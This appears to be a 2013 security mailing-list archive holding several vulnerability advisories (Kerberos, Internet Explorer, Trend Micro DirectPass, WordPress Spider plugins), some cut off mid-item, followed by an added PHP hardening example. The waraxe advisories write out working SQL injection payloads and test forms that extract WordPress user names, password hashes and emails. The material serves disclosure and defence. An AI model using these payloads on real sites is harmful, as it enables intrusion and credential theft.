[ MDVSA-2013:166 ] krb5

2013-05-22 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2013:166
 http://www.mandriva.com/en/support/security/
 ___

 Package : krb5
 Date: May 21, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in krb5:
 
 The kpasswd service provided by kadmind was vulnerable to a UDP
 ping-pong attack (CVE-2002-2443).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2443
 https://bugzilla.redhat.com/show_bug.cgi?id=962531
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 762c01ff4ce813cd3c5acce794c29aa3  mes5/i586/krb5-1.8.1-0.11mdvmes5.2.i586.rpm
 415beef49e20f8b89c84b0270afbf1d6  mes5/i586/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.i586.rpm
 a6bd6778ab49710b1a50633555b0dc27  mes5/i586/krb5-server-1.8.1-0.11mdvmes5.2.i586.rpm
 497cfca620c25dd7ce523a61afdccc5e  mes5/i586/krb5-server-ldap-1.8.1-0.11mdvmes5.2.i586.rpm
 2fe4670b52795e8c74f53e7eee826c2c  mes5/i586/krb5-workstation-1.8.1-0.11mdvmes5.2.i586.rpm
 22926f634ea6ba5f816c14a2e30cc38a  mes5/i586/libkrb53-1.8.1-0.11mdvmes5.2.i586.rpm
 477f8f61cd9c8e577cd6797e850978ce  mes5/i586/libkrb53-devel-1.8.1-0.11mdvmes5.2.i586.rpm
 77c66246600b71f6471f75054e886cd4  mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 1cab52ff4c719378b97ec3acbc7d911f  mes5/x86_64/krb5-1.8.1-0.11mdvmes5.2.x86_64.rpm
 b5d51d32e5eaa96ab973e5ce151a5254  mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.x86_64.rpm
 6218fc79250aaec5c7ca19b193fdb8dc  mes5/x86_64/krb5-server-1.8.1-0.11mdvmes5.2.x86_64.rpm
 88de99aa8cde8adaee672c265292a355  mes5/x86_64/krb5-server-ldap-1.8.1-0.11mdvmes5.2.x86_64.rpm
 39791a90573b4de08efdaf0193bbc5dc  mes5/x86_64/krb5-workstation-1.8.1-0.11mdvmes5.2.x86_64.rpm
 846b75578bb5559cfcf7aa2ce9e43156  mes5/x86_64/lib64krb53-1.8.1-0.11mdvmes5.2.x86_64.rpm
 7351a8d2be13df25ab9c2534489a2da0  mes5/x86_64/lib64krb53-devel-1.8.1-0.11mdvmes5.2.x86_64.rpm
 77c66246600b71f6471f75054e886cd4  mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm

 Mandriva Business Server 1/X86_64:
 3150d604a21be2373d223457da156734  mbs1/x86_64/krb5-1.9.2-3.3.mbs1.x86_64.rpm
 52729f0759e686cfdf5f9c99efc28862  mbs1/x86_64/krb5-pkinit-openssl-1.9.2-3.3.mbs1.x86_64.rpm
 4b997282ad6dd76eb7a10f07809bef71  mbs1/x86_64/krb5-server-1.9.2-3.3.mbs1.x86_64.rpm
 b10b3c0211e071ab93e818db684098f9  mbs1/x86_64/krb5-server-ldap-1.9.2-3.3.mbs1.x86_64.rpm
 417d23306554b1d7d290e8d3fed1a2d8  mbs1/x86_64/krb5-workstation-1.9.2-3.3.mbs1.x86_64.rpm
 a17c8e2438c0415c9ea478bcc0715101  mbs1/x86_64/lib64krb53-1.9.2-3.3.mbs1.x86_64.rpm
 2d05c4ac4b44be10ea1e3d4337689512  mbs1/x86_64/lib64krb53-devel-1.9.2-3.3.mbs1.x86_64.rpm
 95305e2323d63546e970538b7d692447  mbs1/SRPMS/krb5-1.9.2-3.3.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML Remote Integer Overflow (MS13-037 / Pwn2Own)

2013-05-22 Thread VUPEN Security Research
VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML Remote Integer Overflow (MS13-037 / Pwn2Own)

Website : http://www.vupen.com

Twitter : http://twitter.com/vupen


I. BACKGROUND
-

Microsoft Internet Explorer is a web browser developed by Microsoft and
included as part of the Microsoft Windows line of operating systems with
more than 60% of the worldwide usage share of web browsers. (Wikipedia)


II. DESCRIPTION
-

VUPEN Vulnerability Research Team discovered a critical vulnerability
in Microsoft Internet Explorer.

The vulnerability is caused by an integer overflow error in the vml.dll
component when processing certain undocumented vector graphic properties,
which could be exploited by remote attackers to leak arbitrary memory and
compromise a vulnerable system via a malicious web page.

CVE: CVE-2013-2551


III. AFFECTED PRODUCTS
---

Microsoft Internet Explorer 10
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6

Microsoft Windows RT
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows Server 2012
Microsoft Windows 7 for 32-bit Systems
Microsoft Windows 7 for 32-bit Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 for 32-bit Systems
Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems
Microsoft Windows Server 2008 for x64-based Systems Service Pack 2
Microsoft Windows Server 2008 for Itanium-based Systems
Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2
Microsoft Windows Server 2008 R2 for x64-based Systems
Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 R2 for Itanium-based Systems
Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2
Microsoft Windows Server 2003 Service Pack 2
Microsoft Windows Server 2003 x64 Edition Service Pack 2
Microsoft Windows Server 2003 with SP2 for Itanium-based Systems
Microsoft Windows XP Service Pack 3
Microsoft Windows XP Professional x64 Edition Service Pack 2


IV. Binary Analysis & Exploits/PoCs
---

In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit will be available through the VUPEN BAE
(Binary Analysis & Exploits) portal:

http://www.vupen.com/english/services/ba-index.php

VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.

The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.


V. VUPEN Threat Protection Program
---

Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the vulnerability
when it was discovered by VUPEN in advance of its public disclosure, and
have received detailed attack detection guidance to protect national and
critical infrastructures against potential 0-day attacks exploiting this
vulnerability:

http://www.vupen.com/english/services/tpp-index.php


VI. SOLUTION
-

Apply MS13-037 security updates.


VII. CREDIT
--

This vulnerability was discovered by Nicolas Joly of VUPEN Security.


VIII. ABOUT VUPEN Security
---

VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.

VUPEN solutions include:

* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/services/tpp-index.php


IX. REFERENCES
--

http://technet.microsoft.com/en-us/security/bulletin/ms13-037
http://www.vupen.com/english/research.php


X. DISCLOSURE TIMELINE
-

2011-11-09 - Vulnerability Discovered by VUPEN
2013-03-06 - Vulnerability Reported to Microsoft During Pwn2Own 2013
2013-05-20 - Public disclosure



VUPEN Security Research - Microsoft Internet Explorer 10-9 Object Confusion Sandbox Bypass (MS13-037 / Pwn2Own)

2013-05-22 Thread VUPEN Security Research
VUPEN Security Research - Microsoft Internet Explorer 10-9 Object Confusion Sandbox Bypass (MS13-037 / Pwn2Own)

Website : http://www.vupen.com

Twitter : http://twitter.com/vupen


I. BACKGROUND
-

Microsoft Internet Explorer is a web browser developed by Microsoft and
included as part of the Microsoft Windows line of operating systems with
more than 60% of the worldwide usage share of web browsers. (Wikipedia)


II. DESCRIPTION
-

VUPEN Vulnerability Research Team discovered a critical vulnerability
in Microsoft Internet Explorer.

The vulnerability is caused by an object confusion error in the IE broker
process when processing unexpected variant objects, which could allow an
attacker to execute arbitrary code within the context of the broker process
to bypass Internet Explorer Protected Mode sandbox.


III. AFFECTED PRODUCTS
---

Microsoft Internet Explorer 10
Microsoft Internet Explorer 9

Microsoft Windows RT
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows Server 2012
Microsoft Windows 7 for 32-bit Systems
Microsoft Windows 7 for 32-bit Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 for 32-bit Systems
Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems
Microsoft Windows Server 2008 for x64-based Systems Service Pack 2
Microsoft Windows Server 2008 for Itanium-based Systems
Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2
Microsoft Windows Server 2008 R2 for x64-based Systems
Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 R2 for Itanium-based Systems
Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2


IV. Binary Analysis & Exploits/PoCs
---

In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit will be available through the VUPEN BAE
(Binary Analysis & Exploits) portal:

http://www.vupen.com/english/services/ba-index.php

VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.

The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.


V. VUPEN Threat Protection Program
---

Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the vulnerability
when it was discovered by VUPEN in advance of its public disclosure, and
have received detailed attack detection guidance to protect national and
critical infrastructures against potential 0-day attacks exploiting this
vulnerability:

http://www.vupen.com/english/services/tpp-index.php


VI. SOLUTION
-

Apply MS13-037 security updates.


VII. CREDIT
--

This vulnerability was discovered by Nicolas Joly of VUPEN Security.


VIII. ABOUT VUPEN Security
---

VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.

VUPEN solutions include:

* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/services/tpp-index.php


IX. REFERENCES
--

http://technet.microsoft.com/en-us/security/bulletin/ms13-037
http://www.vupen.com/english/research.php


X. DISCLOSURE TIMELINE
-

2011-11-23 - Vulnerability Discovered by VUPEN
2013-03-06 - Vulnerability Reported to Microsoft During Pwn2Own 2013
2013-05-20 - Public disclosure



Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities

2013-05-22 Thread Vulnerability Lab
Title:
==
Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities


Date:
=
2013-05-21


References:
===
http://www.vulnerability-lab.com/get_content.php?id=894

Article: http://www.vulnerability-lab.com/dev/?p=580

Trend Micro (Reference): 
http://esupport.trendmicro.com/solution/en-US/1096805.aspx
Trend Micro Solution ID: 1096805

Video: http://www.vulnerability-lab.com/get_content.php?id=951


VL-ID:
=
894


Common Vulnerability Scoring System:

6.1


Introduction:
=
Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure location, so you only need to remember one password. Other features include: Keystroke encryption, secure password generation, automatic form-filling, confidential notes, and a secure browser.

Convenience - You can securely and easily manage passwords for numerous online accounts with just one password and automatically login to your websites with one click. More Security - You get an extra layer of online security with a specially designed browser for online banking and financial websites and protection from keylogging malware. No Hassles – You don’t have to be a technical wizard to benefit from this password service, it’s simple to use. Confidence – You can have peace-of-mind using a password service provided by an Internet security provider with 20+ years of experience. All Your Devices – You can use DirectPass password manager on Windows PCs, Android mobile, Android Tablet, iPads and iPhones, and all devices are automatically encrypted and synchronized using the cloud.

(Copy of the Vendor Homepage: http://www.trendmicro.com/us/home/products/directpass/index.html )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple software 
vulnerabilities in the official Trend Micro DirectPass v1.5.0.1060 Software.


Report-Timeline:

2013-03-08: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-03-09: Vendor Notification (Trend Micro - Security Team)
2013-03-16: Vendor Response/Feedback (Trend Micro - Karen M.)
2013-05-09: Vendor Fix/Patch (Trend Micro - Active Update Server)
2013-05-15: Vendor Fix/Patch (Trend Micro - Solution ID & Announcement)
2013-05-21: Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Trend Micro
Product: DirectPass 1.5.0.1060


Exploitation-Technique:
===
Local


Severity:
=
High


Details:

1.1
A local command injection vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 Software.
The vulnerability allows local low privileged system user accounts to inject system specific commands or local path requests to compromise the software.

The vulnerability is located in the direct-pass master password setup module of the Trend Micro InstallWorkspace.exe file.
The master password module of the software allows users to review the included password in the second step for security reasons. The hidden protected master password will only be visible in the check module when the customer is processing to mouse-over onto the censored password field. When the software is processing to display the hidden password in plain, the command/path injection will be executed out of the not parsed master password context in the field listing.

Exploitation of the vulnerability requires a low privilege system user account with direct-pass access and low or medium user interaction. Successful exploitation of the vulnerability results in software and system process compromise or execution of local system specific commands/path.

Vulnerable File(s):
[+] InstallWorkspace.exe

Vulnerable Module(s):
[+] Setup Master Password

Vulnerable Parameter(s):
[+] Master Password

Affected Module(s):
[+] Check Listing (Master Password)


1.2
A persistent input validation vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 Software.
The bug allows local attackers with a low privileged system user account to implement/inject malicious script code on the application side (persistent) of the software.

The persistent web vulnerability is located in the direct-pass check module when processing to list a manipulated master password. In step one, a malicious iframe is injected in the hidden fields as master password. The inserted context will be saved and the execution will be in the next step when processing to list the master password context in the last check module. To bypass the validation and execute the injected script code the attacker needs to split (%20) the input request.

Exploitation of the vulnerability requires medium user interaction and a low privilege system user account with direct-pass.
Successful exploitation 

[waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin

2013-05-22 Thread come2waraxe
[waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin
===

Author: Janek Vind waraxe
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html


Description of vulnerable software:
~~~

Spider Event Calendar is a highly configurable plugin which allows you
to have multiple organized events in a calendar. This plugin is one of
the best WordPress Calendar available in WordPress Directory. If you
have problem with organizing your WordPress Calendar events and displaying
them in a calendar format, then Spider WordPress Calendar Plugin is the
best solution.

http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html

Vulnerable is current version 1.3.0, older versions not tested.


###
1. Insufficient access check for AJAX operations in calendar.php
###

Reason:
1. weak access control implementation
Preconditions:
1. must be logged in as Wordpress user
Impact:
1. Any Wordpress user can edit Spider Calendar

Php script calendar.php line 197:
[ source code start ]--
add_action('wp_ajax_spidercalendarinlineedit', 'spider_calendar_quick_edit');

add_action('wp_ajax_spidercalendarinlineupdate', 'spider_calendar_quick_update');
function spider_calendar_quick_update(){

global $wpdb;

if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) && isset($_POST['us_12_format_sp_calendar'])){
$wpdb->update(
..
function spider_calendar_quick_edit(){
global $wpdb;
if(isset($_POST['calendar_id'])){
$row=$wpdb->get_row(
[ source code end ]

We can see that AJAX actions wp_ajax_spidercalendarinlineedit and
wp_ajax_spidercalendarinlineupdate are bound to functions spider_calendar_quick_edit
and spider_calendar_quick_update. These two functions are meant to be used only
by admin, but there is nothing to stop low privileged users. Even users with
Subscriber access level can use those two AJAX functions.

Test:

<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineedit" method="post">
<input type="hidden" name="calendar_id" value="1">
<input type="submit" value="Test">
</form>
</center></body></html>

Result: calendar editing form will be shown

Remark: This weakness in access control makes the next two SQL injection vulnerabilities
much more critical - there is no need for admin privileges, even a low level
Wordpress user is able to exploit these vulnerabilities.


###
2. SQL Injection in calendar.php function spider_calendar_quick_update
###

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied POST parameter calendar_id
Preconditions:
1. must be logged in as Wordpress user


Php script calendar.php line 199:
[ source code start ]--
add_action('wp_ajax_spidercalendarinlineupdate', 'spider_calendar_quick_update');
function spider_calendar_quick_update(){

global $wpdb;

if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) && isset($_POST['us_12_format_sp_calendar'])){
..
$row=$wpdb->get_row("SELECT * FROM ".$wpdb->prefix."spidercalendar_calendar WHERE id=".$_POST['calendar_id']);
[ source code end ]

As seen above, user-supplied POST parameter calendar_id is used in SQL query
without any sanitization, resulting in SQL injection vulnerability.

Test:

<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineupdate" method="post">
<input type="hidden" name="calendar_title" value="1">
<input type="hidden" name="us_12_format_sp_calendar" value="2">
<input type="hidden" name="calendar_id" value="0 UNION SELECT 1,(SELECT CONCAT_WS(0x3a,user_login,user_pass,user_email) FROM wp_users WHERE ID=1),3,4,5,6,7">
<input type="submit" value="Test">
</form>
</center></body></html>

Result: in case of success, sensitive information about the Wordpress user
with ID 1 will be revealed: username, password hash and email.


###
3. SQL Injection in calendar.php function spider_calendar_quick_edit
###

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. 

[waraxe-2013-SA#105] - Multiple Vulnerabilities in Spider Catalog Wordpress Plugin

2013-05-22 Thread come2waraxe
[waraxe-2013-SA#105] - Multiple Vulnerabilities in Spider Catalog Wordpress Plugin
===

Author: Janek Vind waraxe
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html


Description of vulnerable software:
~~~

Spider Catalog is the best WordPress catalog plugin. It is a convenient tool
for organizing the products represented on your website into catalogs. Each
product on the catalog is assigned with a relevant category, which makes it
easier for the customers to search and identify the needed products within the
catalog.

http://wordpress.org/extend/plugins/catalog/
http://web-dorado.com/products/wordpress-catalog.html

Vulnerable is current version 1.4.6, older versions not tested.


###
1. SQL Injection in Spider Catalog Shortcodes
###

Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied shortcode parameter id
Preconditions:
  1. must be logged in as user with posting privileges (Author level
  required as minimum by default)


Php script catalog.php line 101:
[ source code start ]--
add_shortcode('Spider_Catalog_Category', 'Spider_Catalog_Products_list_shotrcode');

function Spider_Catalog_Single_product_shotrcode($atts) {
 extract(shortcode_atts(array(
  'id' => '',
 ), $atts));
 return spider_cat_Single_product($id);
}
add_shortcode('Spider_Catalog_Product', 'Spider_Catalog_Single_product_shotrcode');
..
function spider_cat_Single_product($id)
{
..
  return front_end_single_product($id);
[ source code end ]

We can see that two shortcodes are defined: Spider_Catalog_Category and
Spider_Catalog_Product. Both of them have an SQL Injection vulnerability via
shortcode parameter id.
Let's analyze the shortcode Spider_Catalog_Product implementation.
Parameter id from shortcode Spider_Catalog_Product will be used in function
front_end_single_product() as argument.

Php script front_end_functions.php line 18:
[ source code start ]--
function front_end_single_product($id)
{
..
 $product_id=$id;
..
 $query = "SELECT ".$wpdb->prefix."spidercatalog_products.*, "
   .$wpdb->prefix."spidercatalog_product_categories.name as cat_name FROM "
   .$wpdb->prefix."spidercatalog_products left join "
   .$wpdb->prefix."spidercatalog_product_categories on "
   .$wpdb->prefix."spidercatalog_products.category_id="
   .$wpdb->prefix."spidercatalog_product_categories.id where "
   .$wpdb->prefix."spidercatalog_products.id='".$product_id."' and "
   .$wpdb->prefix."spidercatalog_products.published = '1' ";
 $rows = $wpdb->get_results($query);
[ source code end ]

As seen above, parameter id is used in SQL query without any sanitization,
which leads to SQL Injection vulnerability.

Tests:

Log in as user with posting privileges and use shortcode as below:

[Spider_Catalog_Product id=0' UNION SELECT 
1,2,3,@@version,5,6,7,8,9,10,11,12#]

Now open the webpage containing the specific post and MySQL version info will be revealed.

Second test:

[Spider_Catalog_Product id=0' UNION SELECT 1,2,3,(SELECT 
CONCAT_WS(0x3a,user_login,user_pass)FROM wp_users WHERE 
ID=1),5,6,7,8,9,10,11,12#]

As result, sensitive information (username and hashed password) will be revealed
for Wordpress user with ID 1 (usually admin).

SQL Injection in other shortcode can be exploited in similar way:

[Spider_Catalog_Category id=0 UNION SELECT 1,2,@@version,4,5,6,7,8#]

.. and we can see MySQL version info (look at the html source code):

<a style="cursor:pointer;" onclick="catt_idd_1(5.5.30)">Back to Catalog</a>


###
2. SQL Injection in catalog.php function catalog_after_search_results()
###

Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied parameter s
Preconditions: none


Php script catalog.php line 39:
[ source code start ]--
function catalog_after_search_results($query){
global $wpdb;
if(isset($_REQUEST['s']) && $_REQUEST['s']){
$serch_word=htmlspecialchars(stripslashes($_REQUEST['s']));
$query=str_replace($wpdb->prefix."posts.post_content",
  gen_string_catalog_search($serch_word,$wpdb->prefix.'posts.post_content')
  ." ".$wpdb->prefix."posts.post_content",$query);
}
return $query;

}
add_filter( 'posts_request', 'catalog_after_search_results');
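Added hardening example (not code from the Spider plugins or from waraxe's advisories): the calendar AJAX update handler from SA#104 and the catalog product shortcode from SA#105 rewritten with a capability check, a nonce and $wpdb->prepare(), since wp_ajax_{action} hooks fire for every logged-in user and shortcode attributes are written by anyone with posting rights. Table names follow the advisory excerpts; the nonce action name, the 'manage_options' capability, the 'title', 'us_12_format' and 'name' column names and the wp_send_json_* responses are assumptions.

```php
<?php
// Added hardening example, not from either plugin. Table names follow the
// advisories; column names, nonce action and capability are assumptions.

// wp_ajax_{action} runs for any authenticated user regardless of role, so
// the handler itself must enforce a nonce and a capability before any SQL.
add_action('wp_ajax_spidercalendarinlineupdate', 'spider_calendar_quick_update_hardened');

function spider_calendar_quick_update_hardened() {
    global $wpdb;

    // 1. CSRF: the request must carry a nonce for this action
    //    (assumed action name 'spidercalendar_inline_update'); dies on failure.
    check_ajax_referer('spidercalendar_inline_update', '_ajax_nonce');

    // 2. Authorization: Subscribers must not reach this code path.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient privileges', 403);
    }

    if (!isset($_POST['calendar_id'], $_POST['calendar_title'], $_POST['us_12_format_sp_calendar'])) {
        wp_send_json_error('missing parameters', 400);
    }

    // 3. Type enforcement: the id is an integer, so coerce it before it
    //    reaches SQL; "0 UNION SELECT ..." collapses to plain 0.
    $calendar_id = absint($_POST['calendar_id']);
    $title       = sanitize_text_field(wp_unslash($_POST['calendar_title']));
    $us_12       = absint($_POST['us_12_format_sp_calendar']);

    $table = $wpdb->prefix . 'spidercalendar_calendar';

    // 4. Parameterised query: %d binds the id as an integer.
    $row = $wpdb->get_row(
        $wpdb->prepare("SELECT * FROM {$table} WHERE id = %d", $calendar_id)
    );
    if (!$row) {
        wp_send_json_error('no such calendar', 404);
    }

    // $wpdb->update() escapes each value according to the given format list.
    $wpdb->update(
        $table,
        array('title' => $title, 'us_12_format' => $us_12), // assumed column names
        array('id' => $calendar_id),
        array('%s', '%d'),
        array('%d')
    );
    wp_send_json_success();
}

// Shortcode handler (SA#105): attributes come from post authors, so they are
// untrusted; no extract(), integer coercion, prepared statement.
add_shortcode('Spider_Catalog_Product', 'spider_catalog_single_product_hardened');

function spider_catalog_single_product_hardened($atts) {
    global $wpdb;
    $atts       = shortcode_atts(array('id' => 0), $atts);
    $product_id = absint($atts['id']);   // "0' UNION SELECT ..." -> 0
    if ($product_id === 0) {
        return '';
    }

    $products   = $wpdb->prefix . 'spidercatalog_products';
    $categories = $wpdb->prefix . 'spidercatalog_product_categories';

    $rows = $wpdb->get_results($wpdb->prepare(
        "SELECT {$products}.*, {$categories}.name AS cat_name
           FROM {$products}
           LEFT JOIN {$categories} ON {$products}.category_id = {$categories}.id
          WHERE {$products}.id = %d AND {$products}.published = '1'",
        $product_id
    ));
    // Escape on output as well, so a stored value cannot become script.
    return $rows ? esc_html($rows[0]->name) : '';   // assumed 'name' column
}
```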